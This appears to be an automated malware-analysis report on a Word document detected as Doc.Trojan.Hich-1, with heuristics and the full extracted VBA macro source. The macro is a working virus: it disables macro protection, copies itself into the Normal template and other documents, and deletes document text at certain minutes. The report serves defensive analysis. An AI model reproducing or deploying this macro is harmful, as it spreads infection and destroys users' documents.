MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The macros appear to be designed to obfuscate their own code and potentially modify the document content, as indicated by the `CIH` subroutine and the manipulation of document ranges. The `ClamAV: Doc.Trojan.Hich-1` detection further supports its malicious nature. The exact payload or behavior is unclear due to macro obfuscation and truncation.
Heuristics 2
-
ClamAV: Doc.Trojan.Hich-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hich-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1959 bytes |
SHA-256: 59f4192feb218fb436f8b6faecf0aaa5106471733837ba9aef0c0a1b72c6dbe3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
CIH
End Sub
Private Sub CIH()
On Error Resume Next
Dim StartLoc, ProcLen, Obj, Str, i, s, Lose
s = ActiveDocument.Saved: Application.EnableCancelKey = 0
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Set Obj = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
StartLoc = Obj.ProcStartLine("CIH", 0): ProcLen = Obj.ProcCountLines("CIH", 0)
Str = Obj.Lines(StartLoc, ProcLen)
Set Obj = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
i = Empty: i = Obj.ProcStartLine("CIH", 0)
If i <> Empty Then
Set Obj = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
i = Empty: i = Obj.ProcStartLine("CIH", 0)
If i <> Empty Then Obj = ""
End If
If Obj <> "" Then
i = Empty: i = Obj.ProcStartLine("Document_Close", 0)
If i = Empty Then
Obj.InsertLines Obj.CountOfLines + 1, "Private Sub Document_Close()" & Chr(13) & " CIH" & Chr(13) & "End Sub"
Else
Obj.InsertLines Obj.ProcStartLine("Document_Close", 0) + 1, " CIH"
End If
Obj.InsertLines Obj.CountOfLines + 1, Str
End If
If Minute(Now) = 1 Then ActiveDocument.Range(ActiveDocument.Characters.Count / 2 * (1 - 0.1 * Rnd), ActiveDocument.Characters.Count / 2 * (1 + 0.1 * Rnd)) = ""
If Minute(Now) = 26 Then ActiveDocument.Range(0, ActiveDocument.Characters.Count) = "": Lose = True
If s = False Then ActiveDocument.Save
If Lose = True And ActiveDocument.Saved Then Do: Loop
ActiveDocument.Saved = True
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.